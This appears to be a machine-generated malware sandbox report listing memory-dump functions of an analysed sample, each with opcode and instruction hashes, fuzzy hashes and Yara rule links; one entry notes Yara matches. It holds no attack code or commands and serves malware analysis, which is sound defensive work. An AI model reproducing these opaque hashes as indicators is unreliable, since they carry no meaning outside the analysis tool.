                                                      • Opcode Fuzzy Hash: 9107dc1864bbfd4ebd8e7ca66ad09ce204fdce0b87d1242d6bc925690b462951
                                                      • Instruction Fuzzy Hash: A3217AB1A00645AFDB1ADF68D884E6AB7A8FF48744F140069F904D7791D735ED10CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011590AF, Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction ID: 3f687515bcc3a0f0cd7ec3f1c19c9e4d014e709776148063199fc7395279342a
                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction Fuzzy Hash: C9219275A00319EFDB25DF59C884EAAFBF8EB54324F15886AE959A7200D330ED40CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01143B7A, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 04932ab639c49c38997b3671327b0bd6f731c4efee4cb85cd663c584cc304296
                                                      • Instruction ID: eb974efc955598f8ca307deebde8ae0bd901d0458e8f0d3dd11f0bd62d0e736a
                                                      • Opcode Fuzzy Hash: 04932ab639c49c38997b3671327b0bd6f731c4efee4cb85cd663c584cc304296
                                                      • Instruction Fuzzy Hash: A621D1B2A00519EFCB19DF58DD81F5ABBBDFB40708F150169EA08AB252C371ED01CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01196CF0, Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bc2e3a13fef52c60e1edc2c53bb1adbac19a41fec54fb1067192ce5afcd8ac9
                                                      • Instruction ID: a3bef1f5653a27d91a1d0b5f83e928c081743a64059bb557b8284de9167cae20
                                                      • Opcode Fuzzy Hash: 1bc2e3a13fef52c60e1edc2c53bb1adbac19a41fec54fb1067192ce5afcd8ac9
                                                      • Instruction Fuzzy Hash: 8821F5725002459BDB19EF2CC944B6FBBECAF91694F040556FAA0C7291D734C949C6B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E070D, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction ID: 2ce3164c9d8ddb907f8899918d0b2b57f2ccb9c54f5e07a8853d27b156b71665
                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction Fuzzy Hash: C0214636704A00AFD709DF9CC888B6ABBE5EFD4350F048569F9948B381DB70D809CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01197794, Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1586001f784d1f03cd37ee8d414240c70f0393c65260b27398ebf5b5d584fa78
                                                      • Instruction ID: 5648921b9de75cfa96841c37b18545bfd0dc437e755fd0c49d124f82d159f1d0
                                                      • Opcode Fuzzy Hash: 1586001f784d1f03cd37ee8d414240c70f0393c65260b27398ebf5b5d584fa78
                                                      • Instruction Fuzzy Hash: C321A472510A04EFCB29DF69D884E5BBBA8EF48340F10056DF619C7790D734E900CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0113AE73, Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 923b21900c7b02bd8381c8ec23371c1d09b6a30eafafb74d5bc86e614da62589
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: B921D472605685DFE71FAB29D948B2577E8EF84354F1A00A0DD04CB696D738DC40CAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114FD9B, Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: a868fdbdf5db926eaf2930b7ba36f51c8a0fbfc6d5e2d48bb13cefdf929dea99
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: DE21A972600A42DFD739CF0DC640E66B7E5EB94E11F22806EE98997B11D730AC02CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114B390, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30ec161640d90e0571f4667950b5ce6efe1571548c5319b55ebcac067015eef4
                                                      • Instruction ID: 3c5ec7936bd2aff7057d9e9383531d278c12e58c5ec16269e49fb72e7aba1b04
                                                      • Opcode Fuzzy Hash: 30ec161640d90e0571f4667950b5ce6efe1571548c5319b55ebcac067015eef4
                                                      • Instruction Fuzzy Hash: CD116B337191109FCB1E9A5A9D81A2B736AEFC5730B2A4139EE16C73C0CB319C02CA95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01119240, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3dcd03003b1e9c7fe676a128d4a7d19da6e98b2a5d55ddf7325bd4768c10b34b
                                                      • Instruction ID: 2fe2e1e1419330770d3a5d58f9b02f077a9e8e11593a428100e22fb81779525d
                                                      • Opcode Fuzzy Hash: 3dcd03003b1e9c7fe676a128d4a7d19da6e98b2a5d55ddf7325bd4768c10b34b
                                                      • Instruction Fuzzy Hash: 43219A71450A05DFC76AEF68CA14F1AB7F9FF18308F01466CE149876A6CB34EA51CB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011A4257, Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb8bc1fa2f75e996fa8405bf9d3ba396ca3c2d3bc2d5e3ac2b424f1a4ffe8fad
                                                      • Instruction ID: 64a461aaa2f094ac67a6881e2def835342119cf272c5fa389e9c6638bdf0c06c
                                                      • Opcode Fuzzy Hash: cb8bc1fa2f75e996fa8405bf9d3ba396ca3c2d3bc2d5e3ac2b424f1a4ffe8fad
                                                      • Instruction Fuzzy Hash: C0216D79901601CFC72EDF68F004615BBF1FF99358BA8836EC1458FAAAD7B19451CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01142397, Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 371e7263de24bd1d7367d9885eb0b606f1dd3c7300d07f06e53dc99b76f07f07
                                                      • Instruction ID: b5188be5277c9592ffd9f50a45daf38d0649fc5733c78549035e71172605a145
                                                      • Opcode Fuzzy Hash: 371e7263de24bd1d7367d9885eb0b606f1dd3c7300d07f06e53dc99b76f07f07
                                                      • Instruction Fuzzy Hash: 44118231F0430297E73DA62DFC80F16B6D8FBA4B20F094119F70297191C7B0D8818755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011946A7, Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction ID: b9d7a9051bf4dbc1dd5875bc204055eee9ae531719ea447f474abdf453178e9e
                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction Fuzzy Hash: C4112572504608BFCB099F5CD8808BEB7B9EF95304F1080AAF944C7351DB318D55D3A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111C962, Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcb09e53ad739c7dd7c0bebef19641102b344f68df0958e4ab7fa87431c1b56f
                                                      • Instruction ID: 043623808832feb574400d2e0cd78a65c3fc599890fc2252cb02303c64b3ce15
                                                      • Opcode Fuzzy Hash: fcb09e53ad739c7dd7c0bebef19641102b344f68df0958e4ab7fa87431c1b56f
                                                      • Instruction Fuzzy Hash: EB110C323106079BC719FF2DDC85A5777E6FB94514B104638F95183691DB60EC14CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011537F5, Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e179f1ff682e870a81511af8368479504c153b1bb3d9b44e22b6c66a0c57cd6
                                                      • Instruction ID: f74a44bd479e96525ad7f7d49d0fe425506c55ddb9f425164615e9fd37877f52
                                                      • Opcode Fuzzy Hash: 3e179f1ff682e870a81511af8368479504c153b1bb3d9b44e22b6c66a0c57cd6
                                                      • Instruction Fuzzy Hash: C50104B2911A11DBC37F8A5D9900E26BBA6FF95B907164269ED758B206D730C801C780
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114002D, Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: f7130ceec2a31e3760050fcf7cd04dda0280dbce49f2cde64a02a91e2f30a4cc
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: 5F112B72201682CFE72FE72DC948B7537D4EF44B94F1A00A0EE0487A93DB28C841CA51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112766D, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction ID: ec7c95bda075f1c8448f45569f5988dbb26b66bca6f05972bf613f9efb17a13a
                                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction Fuzzy Hash: 8D01FC32300129ABE734DE9ECC50E5B7BADEB94A60F180164FA08CB2C0DB30DC51C3A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01119080, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9464e1dd02466fbf99ccc2adb150fb0d47f3c77e338c273b3d5ec5717f86122
                                                      • Instruction ID: 8dcca04babf96552227244f8a54bb238b8fbc525a09aaca39c5b303e9cb522e8
                                                      • Opcode Fuzzy Hash: f9464e1dd02466fbf99ccc2adb150fb0d47f3c77e338c273b3d5ec5717f86122
                                                      • Instruction Fuzzy Hash: 8701F4725013188FC32E9F08D840B26BBB9FB85328F214136E1158BA9AD374DC41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011AC450, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: 9a9eb4c978f4bc9ee3caba772c8d62accc85b1c83395e82a34b07df0685adf13
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: F001967514050AFFE719AF69CC80E62FB6DFF54358F404525F61442560C721ACA1CAE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E4015, Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc02de652de5d4de8c83b98c8de0e6d07d9729fb0c3311237b803d47c327ce6d
                                                      • Instruction ID: 5c137c0b737f76e14597a79c67e052c71e1649aa1fed81e4a511e3ea63d88747
                                                      • Opcode Fuzzy Hash: bc02de652de5d4de8c83b98c8de0e6d07d9729fb0c3311237b803d47c327ce6d
                                                      • Instruction Fuzzy Hash: 41018472601A4A7FD319BB69CD84E53BBACFB99654B000225F50883A51DB34EC11C6E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011D138A, Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb1d29c618feed3c077733c3f168fb4d5cf83cfb476917719ee72086911f0f4c
                                                      • Instruction ID: e7a93619925ac5e8ae32ff092f5d1cccf754bfac77a0c35306937d8a9b92e941
                                                      • Opcode Fuzzy Hash: cb1d29c618feed3c077733c3f168fb4d5cf83cfb476917719ee72086911f0f4c
                                                      • Instruction Fuzzy Hash: 00019E71A0420DFFCB18DFA8D885EAEBBB8EF44710F004066F910EB280DB749A01CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011D14FB, Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f7492d6a5946022b2b7ced2518f575f7dc03481f61bf41b69a9ff3d7e6b8606
                                                      • Instruction ID: 826009d70d2ec5f8ca7428b591497207c227c20af5418795b4c0509c7fe01956
                                                      • Opcode Fuzzy Hash: 7f7492d6a5946022b2b7ced2518f575f7dc03481f61bf41b69a9ff3d7e6b8606
                                                      • Instruction Fuzzy Hash: CA019E71A0124DEFDB18DFA8D845EAEBBB8EF45714F404066F914EB280DB74EA00CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011158EC, Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26a0e00a8342aecfe3d81f29b8d96d646dfd281ca41608e592cbef435616270c
                                                      • Instruction ID: b6bbb7d9fa4757b20900920a0cc71f1db2544ed28a8c59000e8719b48a9a74f1
                                                      • Opcode Fuzzy Hash: 26a0e00a8342aecfe3d81f29b8d96d646dfd281ca41608e592cbef435616270c
                                                      • Instruction Fuzzy Hash: D501DF31A101099BCB5CEB69D8059AEBBAAEF82124F450179DA0697288EF20DD018A92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112B02A, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: e47258419f1dbf187d302a37dabe7b8ee700f47de9bb9559d8a15eee643e8f74
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: F5015E722045849FE32B875CE948F6A7BF8EF85654F0D00A1FA15CB691D728DC40C629
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E1074, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7799ad8e726a61524d206c621a38669df9a5c20fa9fa49aaee926005ede29c70
                                                      • Instruction ID: eac444bf97981a5eb4ce730366bb024dfdd3669bb597bcc508fd4df4fedb1053
                                                      • Opcode Fuzzy Hash: 7799ad8e726a61524d206c621a38669df9a5c20fa9fa49aaee926005ede29c70
                                                      • Instruction Fuzzy Hash: 4A014C72604B42AFC719DF68D808B1B7BD5BBD4314F048619F98583691EF30D540CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011CFE3F, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4d525f3df6a8e2ca74a08318450851a94b92d65db5bd8d748fbccc38508107c
                                                      • Instruction ID: 6f9037f1f88cfd349dd67becd8ca4f45b91b550cddd249ff911bea0a9dec6573
                                                      • Opcode Fuzzy Hash: d4d525f3df6a8e2ca74a08318450851a94b92d65db5bd8d748fbccc38508107c
                                                      • Instruction Fuzzy Hash: 4F01D871E0025DEFCB18DFA8D845FAEB7B8EF50B04F004066F9009B281DB309A01CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011CFEC0, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bfe1ae2b44d12fc4a3d3d4f3ed6abd53d93c876ff8b00cd3d6c25691c07a7a0
                                                      • Instruction ID: 195baf7fa1d2bcf223616007fb8fe979404e57b0e219596f27f87cc3bb5dee8d
                                                      • Opcode Fuzzy Hash: 7bfe1ae2b44d12fc4a3d3d4f3ed6abd53d93c876ff8b00cd3d6c25691c07a7a0
                                                      • Instruction Fuzzy Hash: 86018471E0120EAFDB18DBA9D845FAEBBB8EF55714F00406AF910AB290DB749A01C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E8A62, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb23135bbc7d5af3e6dfeaeb04eb1dcffa5d9e2c8ade69f7e6e66126e3a39755
                                                      • Instruction ID: 4cf1669c9d1324d06327d6c7c65a8eaf42b49033927e4a230fa252c1014faac3
                                                      • Opcode Fuzzy Hash: cb23135bbc7d5af3e6dfeaeb04eb1dcffa5d9e2c8ade69f7e6e66126e3a39755
                                                      • Instruction Fuzzy Hash: AE012CB1A0161DEFCB08DFA9D9459AEBBF8EF58314F10405AF905E7341D734A900CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E8ED6, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f16417c994ff154d3c6423062aa0d0345799375e5b395f8a8573fc8c9b310f5
                                                      • Instruction ID: fdc241debbf24c866266426960a0255566e64500638da0e885cd3d01838bf282
                                                      • Opcode Fuzzy Hash: 0f16417c994ff154d3c6423062aa0d0345799375e5b395f8a8573fc8c9b310f5
                                                      • Instruction Fuzzy Hash: 7A111270900609DFDB48DFA8D445BADB7F4FF08304F0442A6E918EB381D7349940CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111DB60, Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: 6da89dd330f0d51fafac8317655a82da3b921bf4225744d4ba9db02684fd2a39
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: C8F0FC732015239BDB3F5AD95888F67F695AFD3A60F160035F6069B34CCB608C0286DA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111B1E1, Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: 6d5723b9ef01821505b02fd225594c0db7da34fa77a55b04f596a47d18c336e8
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: C701F432204684DBD32EA75DD808FA9BBA9EF91754F0900B1FA158BBB6D778D800C319
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00417D4B, Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 488aa0881efbac6efc2806ba25e85ed0e9c963245691e33ee15367bf57aa3b4c
                                                      • Instruction ID: bc845625281af9125a0b54a118c3b41f854ce4fc126533462853f2d4e23f39d6
                                                      • Opcode Fuzzy Hash: 488aa0881efbac6efc2806ba25e85ed0e9c963245691e33ee15367bf57aa3b4c
                                                      • Instruction Fuzzy Hash: B6F024364091868FC7018FA8A4411A6FF71EF8B211B6415CDD890AB413C625A822C7E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011AFE87, Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb3114ef9189c793685a72fbae04ee09973f2076669cca6f64db745aacda06d9
                                                      • Instruction ID: 4c27ab25617fe7e5cb13e61a5ae40e76332c4fce60a2d57b1400bddb7be38cab
                                                      • Opcode Fuzzy Hash: cb3114ef9189c793685a72fbae04ee09973f2076669cca6f64db745aacda06d9
                                                      • Instruction Fuzzy Hash: B4016274A0020DEFCB18DFA8D545A6EBBF4EF04704F504159A914DB382D735D902CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011D131B, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fd30a19e556e29293cf9d679f80f7108d75222f5dfffb971b7d610e9673249a
                                                      • Instruction ID: 747f87049f7cfd66d38be3683be510bae420b35cbe30f26d427a47ec25380091
                                                      • Opcode Fuzzy Hash: 9fd30a19e556e29293cf9d679f80f7108d75222f5dfffb971b7d610e9673249a
                                                      • Instruction Fuzzy Hash: 040119B1A0520DEFCB48EFA9D545AAEB7F4EF58700F008059F915EB381EB349A00CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E8F6A, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc71043de7c34b85759ed75f859b51df170b3575ccafb0b7581585fde547975a
                                                      • Instruction ID: caa41abad7e456576782bbca6547c44d630ab341dc1aa80f381c7ccf5894dbf5
                                                      • Opcode Fuzzy Hash: cc71043de7c34b85759ed75f859b51df170b3575ccafb0b7581585fde547975a
                                                      • Instruction Fuzzy Hash: 44013C74A0120DEFDB08EFA8D549AAEB7F4EF58304F108059B915EB381EB34DA00CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011D1608, Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 71835e7e80957d2bcb2544d7cfadf81ff86af534839c43fcb773a595bd876a1e
